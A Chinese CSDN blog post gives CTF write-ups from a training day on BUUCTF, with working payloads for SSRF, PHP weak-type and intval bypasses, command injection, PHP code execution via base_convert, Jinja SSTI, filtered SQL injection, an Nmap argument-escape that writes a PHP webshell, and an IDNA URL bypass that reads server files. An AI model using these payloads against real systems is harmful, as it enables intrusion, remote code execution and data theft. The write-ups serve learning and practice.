[BUUCTF] 集训第四天

最新推荐文章于 2022-10-16 21:17:21 发布
最新推荐文章于 2022-10-16 21:17:21 发布
阅读量351 收藏
点赞数
分类专栏: CTF 文章标签: flask python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Dannie01/article/details/120578515
版权

[De1CTF 2019]SSRF Me

打开就是乱七八糟的py源码,没有工具,自己缩进,所以要提升代码审计能力,不仅是php还有py

源码

#! /usr/bin/env python
# #encoding=utf-8
from flask import Flask
from flask import request
import socket
import hashlib
import urllib
import sys
import os
import json
reload(sys)
sys.setdefaultencoding('latin1')
 
app = Flask(__name__)
 
secert_key = os.urandom(16)
 
class Task:
    def __init__(self, action, param, sign, ip):
        self.action = action
        self.param = param
        self.sign = sign
        self.sandbox = md5(ip)
        if(not os.path.exists(self.sandbox)):
            os.mkdir(self.sandbox)
 
    def Exec(self):
        result = {}
        result['code'] = 500
        if (self.checkSign()):
            if "scan" in self.action:
                tmpfile = open("./%s/result.txt" % self.sandbox, 'w')
                resp = scan(self.param)
                if (resp == "Connection Timeout"):
                    result['data'] = resp
                else:
                    print resp
                    tmpfile.write(resp)
                    tmpfile.close()
                result['code'] = 200
            if "read" in self.action:
                f = open("./%s/result.txt" % self.sandbox, 'r')
                result['code'] = 200
                result['data'] = f.read()
            if result['code'] == 500:
                result['data'] = "Action Error"
        else:
            result['code'] = 500
            result['msg'] = "Sign Error"
        return result
 
    def checkSign(self):
        if (getSign(self.action, self.param) == self.sign):
            return True
        else:
            return False
 
@app.route("/geneSign", methods=['GET', 'POST'])
def geneSign():
    param = urllib.unquote(request.args.get("param", ""))
    action = "scan"
    return getSign(action, param)
 
@app.route('/De1ta',methods=['GET','POST'])
def challenge():
    action = urllib.unquote(request.cookies.get("action"))
    param = urllib.unquote(request.args.get("param", ""))
    sign = urllib.unquote(request.cookies.get("sign"))
    ip = request.remote_addr
    if(waf(param)):
        return "No Hacker!!!!"
    task = Task(action, param, sign, ip)
    return json.dumps(task.Exec())
 
@app.route('/')
def index():
    return open("code.txt","r").read()
 
def scan(param):
    socket.setdefaulttimeout(1)
    try:
        return urllib.urlopen(param).read()[:50]
    except:
        return "Connection Timeout"
 
def getSign(action, param):
    return hashlib.md5(secert_key + param + action).hexdigest()
 
def md5(content):
    return hashlib.md5(content).hexdigest()
 
def waf(param):
    check=param.strip().lower()
    if check.startswith("gopher") or check.startswith("file"):
        return True
    else:
        return False
if __name__ == '__main__':
    app.debug = False
    app.run(host='0.0.0.0',port=9999)

先看路由/De1ta

@app.route('/De1ta',methods=['GET','POST'])
def challenge():
    action = urllib.unquote(request.cookies.get("action"))
    param = urllib.unquote(request.args.get("param", ""))
    sign = urllib.unquote(request.cookies.get("sign"))
    ip = request.remote_addr
    if(waf(param)):
        return "No Hacker!!!!"
    task = Task(action, param, sign, ip)
    return json.dumps(task.Exec())

获取四个参数action(cookie),param,sign(cookie),ip(不重要)

其中param有黑名单gopher/file(def waf)

进入Task类
调用Exec方法
以json形式返回执行结果

class Task:
    def __init__(self, action, param, sign, ip)://初始化 不用管
 
    def Exec(self):
        result = {}
        result['code'] = 500
        if (self.checkSign()): //检测sign签名
            if "scan" in self.action:   // mark
                tmpfile = open("./%s/result.txt" % self.sandbox, 'w')
                resp = scan(self.param)
                if (resp == "Connection Timeout"):
                    result['data'] = resp
                else:
                    print resp
                    tmpfile.write(resp)
                    tmpfile.close()
                result['code'] = 200
            if "read" in self.action: //mark
                f = open("./%s/result.txt" % self.sandbox, 'r')
                result['code'] = 200
                result['data'] = f.read()
            if result['code'] == 500:
                result['data'] = "Action Error"
        else:
            result['code'] = 500
            result['msg'] = "Sign Error"
        return result

三个条件

  • 首先 checkSign() => getsign() => md5()
def checkSign(self):
	if (getSign(self.action, self.param) == self.sign):
		return True
	else:
		return False

def getSign(action, param):
    return hashlib.md5(secert_key + param + action).hexdigest()
 
def md5(content):
    return hashlib.md5(content).hexdigest()

先跟进getSign
签名重点:

secert_key + param + action
  • action里要包含scan
  • action里要包含read

满足以上三个条件才可以触发ssrf点,也就是触发scan函数

def scan(param):
    socket.setdefaulttimeout(1)
    try:
        return urllib.urlopen(param).read()[:50]
    except:
        return "Connection Timeout"

urlopen(param).read()
根据hint的./flag.txt构造param=flag.txt可获取flag
回溯之前的waf对协议的过滤 但不影响直接读取flag.txt

再回到chenSign本身

    def checkSign(self):
        if (getSign(self.action, self.param) == self.sign):
            return True
        else:
            return False

要满足

getSign(self.action, self.param) == self.sign

有个可以获取sign的路由

@app.route("/geneSign", methods=['GET', 'POST'])
def geneSign():
    param = urllib.unquote(request.args.get("param", ""))
    action = "scan"
    return getSign(action, param)

这里action固定为scan
如果根据之前的逻辑,构造出action=readscan(包含)
这里就要构造param=flag.txtread

serect_key+"flag.txtread"+"scan"

在这里插入图片描述这一步获取关键sign

之后param=flag.txt 于是action=readscan

因为是拼接所以怎么拆分都没有关系

payload1:

/De1ta?param=flag.txt
cookie:action=readscan;sign=7b199007e9543c7c19abd83a9bec58c4;

cookie值抓包或者F12存储修改都可

payload2:

Hash长度扩展攻击

安装工具HashPump

git clone https://github.com/bwall/HashPump
apt-get install g++ libssl-dev
cd HashPump
make
make install

[WUSTCTF2020]朴实无华

robots.txt => /fAke_f1agggg.php => flag{this_is_not_flag} => 响应头 => /fl4g.php

  • intval函数漏洞
    上笔记
<?php
echo intval(42);                      // 42
echo intval(4.2);                     // 4
echo intval('42');                    // 42
echo intval('+42');                   // 42
echo intval('-42');                   // -42
echo intval(042);                     // 34
echo intval('042');                   // 42
echo intval(1e10);                    // 1410065408
echo intval('1e10');                  // 1
echo intval(0x1A);                    // 26
echo intval(42000000);                // 42000000
echo intval(420000000000000000000);   // 0
echo intval('420000000000000000000'); // 2147483647
echo intval(42, 8);                   // 42
echo intval('42', 8);                 // 34
echo intval(array());                 // 0
echo intval(array('foo', 'bar'));     // 1
?>
  • md5 弱类型
    0e215962017

md5(0e215962017)=0e291242476940776845150308577824
自动转换类型=>0

  • 命令执行绕过空格
    ${IFS}

payload:

/fl4g.php?num=2e5&md5=0e215962017&get_flag=tac${IFS}fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag

[CISCN 2019 初赛]Love Math

payload1:

?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){abs})&pi=system&abs=ls%20/

?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){abs})&pi=system&abs=tac%20/flag

解释如下:

base_convert() 函数:在任意进制之间转换数字。
dechex() 函数:把十进制转换为十六进制。
hex2bin() 函数:把十六进制值的字符串转换为 ASCII 字符

base_convert(37907361743,10,36)得到的是函数 hex2bin
dechex(1598506324) 得到的是_GET 进行 hex 编码的值

c 的值定义了 $pi=_GET, 那么 $$pi=$_GET

最后执行的代码为$_GET{system}($_GET{tac /flag})

payload2:

getallheaders函数
在这里插入图片描述

base_convert(696468,10,36) => "exec"
base_convert(8768397090111664438,10,30) =>"getallheaders"

利用
echo exec(getallheaders(){1})   //1表示头信息的其中一个参数
=>
eval('echo '.$content.';');

/?c=$pi=base_convert,$pi(696468,10,36)($pi(8768397090111664438,10,30)(){1})

在这里插入图片描述

[WesternCTF2018]shrine

这次view-source可以自动换行缩进
源码

import flask
import os

app = flask.Flask(__name__)

app.config['FLAG'] = os.environ.pop('FLAG')


@app.route('/')
def index():
    return open(__file__).read()


@app.route('/shrine/<path:shrine>')
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

    return flask.render_template_string(safe_jinja(shrine))


if __name__ == '__main__':
    app.run(debug=True)

明显的ssti模板注入
尝试/shine/{{7*7}}
回显49
self,config黑名单
搜索ssti模板注入博文学习,看到这里直接拿来用
在这里插入图片描述
config,self,()都被过滤的时候,为了获取讯息,我们需要读取一些例如current_app这样的全局变量。
python的沙箱逃逸这里的方法是利用python对象之间的引用关系来调用被禁用的函数对象。

这里有两个函数包含了current_app全局变量,
url_forget_flashed_messages

[SWPU2019]Web1

注册登录发广告,还以为是dom-xss,结果是sql注入
在这里插入图片描述注入点是广告名
'闭合测试

猜测语句

select * from table_name where id = '$id' limit 0,1

列字段数,过滤了order空格,我们用group

1'/**/group/**/by/**/22,'

多了一个逗号,我也不知道为什么

查回显位
在2,3

1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'

-1'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

查库名,版本

-1'union/**/select/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

在这里插入图片描述

在这里插入图片描述查表名,发现过滤了information_schema
还可以用mysql.innodb_table_statssys.schema_auto_increment_colum ns

-1'union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

-1'union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/sys.schema_auto_increment_colum
ns/**/where/**/table_schema=schema()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

但是buu没有
在这里插入图片描述

MySQL5.7的新特性

由于performance_schema过于发杂,所以mysql在5.7版本中新增了sys schemma,基础数据来自于performance_chema和information_schema两个库,本身数据库不存储数据。

schema_auto_increment_columns,该视图的作用简单来说就是用来对表自增ID的监控

无列名注入查字段
flag在users表里

什么是无列名注入?

-1'union/**/select/**/1,(select/**/group_concat(b)/**/from(select/**/1,2,3/**/as/**/b/**/union/**/select/**/*/**/from/**/users)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

select group_concat(b) from(select 1,2 ,3 as b union select * from users)x

[网鼎杯 2020 朱雀组]Nmap

VS

[BUUCTF 2018]Online Tool

知识点:
escapeshellarg
Nmap使用命令

-oN 标准保存
-oX XML保存
-oG Grep保存 
-oA 保存到所有格式
-append-output 补充保存文件

NMAP -iL 文件名
//扫描目标列表
如果你有大量的系统进行扫描,就可以在文本文件中输入IP地址(或主机名),并使用该文件作为输入。

payload1:
过滤了php,利用php文件后缀phtml

127.0.0.1' <?= eval($_POST[cmd]);?> -oG flag.phtml '

payload2:

127.0.0.1' -iL /flag -oN flag.txt '

[SUCTF 2019]Pythonginx

知识点:

配置文件存放目录:/etc/nginx
主配置文件:/etc/nginx/conf/nginx.conf
管理脚本:/usr/lib64/systemd/system/nginx.service
模块:/usr/lisb64/nginx/modules
应用程序:/usr/sbin/nginx
程序默认存放位置:/usr/share/nginx/html
日志默认存放位置:/var/log/nginx
配置文件目录为:/usr/local/nginx/conf/nginx.conf

ngnix让我想到昨晚那道题的apache||ngnix乌龙事件

源码:

@app.route('/getUrl', methods=['GET', 'POST'])
def getUrl():
    url = request.args.get("url")
    host = parse.urlparse(url).hostname
    if host == 'suctf.cc':
        return "我扌 your problem? 111"
    parts = list(urlsplit(url))
    host = parts[1]
    if host == 'suctf.cc':
        return "我扌 your problem? 222 " + host
    newhost = []
    for h in host.split('.'):
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1] = '.'.join(newhost)
    #去掉 url 中的空格
    finalUrl = urlunsplit(parts).split(' ')[0]
    host = parse.urlparse(finalUrl).hostname
    if host == 'suctf.cc':
        return urllib.request.urlopen(finalUrl).read()
    else:
        return "我扌 your problem? 333"

parts = list(urlsplit(url))

list()方法用于将元组转换为列表。
parse.urlprase方法 将url分为6个部分,返回一个包含6个字符串项目的元组:协议、位置、路径、参数、查询、片段

ParseResult(scheme=‘https‘, netloc=‘i.cnblogs.com‘, path=‘/EditPosts.aspx‘, params=‘‘, query=‘opt=1‘, fragment=‘‘)

其中 scheme 是协议 netloc 是域名服务器 path 相对路径 params是参数,query是查询的条件

(来源:水印)
在这里插入图片描述

	for h in host.split('.'):
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1] = '.'.join(newhost)

split() 通过指定分隔符对字符串进行切片,如果参数 num 有指定值,则分隔 num+1 个子字符串,返回分割后的字符串列表。
append()方法用于将传入的对象附加(添加)到现有列表中。
join()方法用于将序列中的元素以指定的字符连接生成一个新的字符串。

知识点:
2019 blackhat 讨论议题

漏洞产生的原因是各国语言的编码形式在进行转换时,会以不同的形式呈现,导致可以构造可以利用的恶意url
当URL 中出现一些特殊字符的时候,输出的结果可能不在预期

在这里插入图片描述
梳理下来总的逻辑就是:
根据代码审计

我们需要绕过前两个if判断,进入第三个if判断去利用read()函数

简单来说就是

在前两个判断时不能是suctf.cc

第三个是suctf.cc

payload:

?url=file://suctf.cℂ/usr/local/nginx/conf/nginx.conf

?url=file://suctf.c%E2%84%82/usr/local/nginx/conf/nginx.conf

在这里插入图片描述

?url=file://suctf.c%E2%84%82/usr/fffffflag

在这里插入图片描述

J1A
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF 4
qq_52431855的博客
01-17 162
知识点: php伪协议 常见的文件包含函数:include、require、include_once、require_once、highlight_file 、show_source 、readfile 、file_get_contents 、fopen 、file, 涉及的相关协议:file://、php://filter、php://input、zip://、compress.bzip2://、compress.zlib://、data:// php://协议:CTF常用php://filt..
[BUUCTF]第四天训练日志
Y1seco的博客
08-04 210
web [网鼎杯2018]Unfinish
替换HTML代码
lizhihui200的专栏
04-21 425
   //删除脚本   content = content.replace(/]*>(.|/s)*/ig,"");      //   content = content.replace(//ig);     //删除HTML   //   content = content.replace(/]*)>/ig, "");   content = content.replace(/([/r/n])[
BUUCTF NewStarCTF 公开赛赛道Week4 Writeup
末初的CSDN博客
10-16 3490
BUUCTF NewStarCTF 公开赛赛道Week4 Writeup
BUUCTF刷题十一道(06)
qq_45837896的博客
07-29 1407
BUUCTF刷题十一道
火线100天2016中考数学复习集训第4讲分式
08-19
4. **分式有意义、值为零的条件**: - 分式有意义的条件是分母不为0,即`B≠0`。 - 分式值为0的条件是分子等于0,且分母不为0,即`A=0`且`B≠0`。 5. **易错提示**: - 在分式运算中,乘方时要特别注意负数的偶...
GESPc++一级集训第四课.pptx
最新发布
06-20
CCF 编 程 能 力 等 级 认 证 , 英 文 名 Grade Examination of Software Programming(以下简称 GESP),由中国计算机学会发起并主办,是为青少年计 算机和编程学习者提供学业能力验证的平台。...
8天集训营课件.zip
05-06
第四天:字符串与正则表达式 字符串处理是Python编程中的重要部分。我们将讲解字符串的切片、连接、查找和替换等操作,以及格式化输出。同时,正则表达式作为文本处理的利器,也将进行深入探讨,包括匹配模式、捕获...
火线100天广西专版2016中考数学复习集训第4讲分式
08-19
4. **分式的运算**: - 分式的乘除法:分式乘法遵循“分子乘分子,分母乘分母”的规则;分式除法则是将除法转换为乘以倒数。 - 分式的乘方:一个分式乘以它自身n次,其结果等于分子乘方再除以分母乘方,n为整数。 ...
刷题集训第二期代码.zip
04-06
"刷题集训第二期代码.zip"这个压缩包文件很可能包含了一组编程练习或算法题目的解决方案,通常这种集训是为提升编程技能,特别是针对准备面试或技术竞赛的程序员们设计的。在这个压缩包中,我们可以期待找到一系列的...
python gif图 ctf_从两道CTF实例看python格式化字符串漏洞
weixin_39608680的博客
12-13 311
什么是python格式化字符串漏洞pyhton中,存在几种格式化字符串的方式,然而当我们使用的方式不正确的时候,即格式化的字符串能够被我们控制时,就会导致一些严重的问题,比如获取敏感信息python常见的格式化字符串百分号形式进行格式化字符串>>> name = 'Hu3sky'>>> 'My name is %s' %name'My name is Hu3sk...
BUUCTF 20
qq_52431855的博客
02-02 144
知识点 Python geneSign() 获得param参数,通过action和param生成签名 challenge() 获得cookies中的action和sign,再去通过url传参获取param,并且使用Task对象,通过json返回Exec()方法 index 得到源码 函数 解释 init(self, action, param, …) 构造方法self代表对象,其他是对象的属性 request.args...
flask框架项目搭建
水痕
03-18 6950
一、本文中使用了flask框架中的flask_script、flask_migrate、flask_sqlalchemy及flask_wtf表单校验二、项目目录结构:|--app.py [项目入口文件的简称] |--config.py 存放配置文件 |--exts.py 对app.py项目文件的扩展 |--models.py 存放所有的ORM数据模型 |--manage.py 存放数据
详解 CTF Web 中的快速反弹 POST 请求
小水池
08-11 8374
目录 0x00 前言 0x01 Python Requests 安装并导入 requests 模块 发送 GET 请求与 POST 请求 查看请求头 查看响应头 查看响应内容 传递 GET 请求参数 传递 POST 请求参数 传递 Cookie 参数 会话对象 Session() 0x02 writeups 【实验吧 CTF】 Web —— 天下武功唯快不破 【Bugk...
request.form和request.args.get的区别
weixin_34112208的博客
05-14 3712
1、若get请求改为post请求,那么我们在后台使用request.args访问参数id的值, 使用request.form访问params参数集中各参数的值 例如: 前端代码: <form method="post"> <tr> 昵称<input type="text" style="text-align:ce...
BUUCTF-WEB刷题记录-2
weixin_44145820的博客
04-08 751
目录[极客大挑战 2019]Secret File[网鼎杯 2018]Fakebook [极客大挑战 2019]Secret File 一直F12 点了之后来到这里 怀疑是跳转,用burp suite抓包 secr3t.php <html> <title>secret</title> <meta charset="UTF-8"&gt...
python格式化字符串_从两道CTF实例看python格式化字符串漏洞
weixin_39638305的博客
11-14 821
什么是python格式化字符串漏洞pyhton中,存在几种格式化字符串的方式,然而当我们使用的方式不正确的时候,即格式化的字符串能够被我们控制时,就会导致一些严重的问题,比如获取敏感信息python常见的格式化字符串百分号形式进行格式化字符串>>> name = 'Hu3sky' >>> 'My name is %s' %name 'My name i...
request.args.get()用法
热门推荐
yk 坤帝
04-17 1万+
name_i = request.args.get(‘name’) 当需要获取前端页面表单传过来的id值的时候,我们就需要用request.args.get,而不能用request.form
暑假集训周报WEEK4
08-04
暑假集训周报WEEK4

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值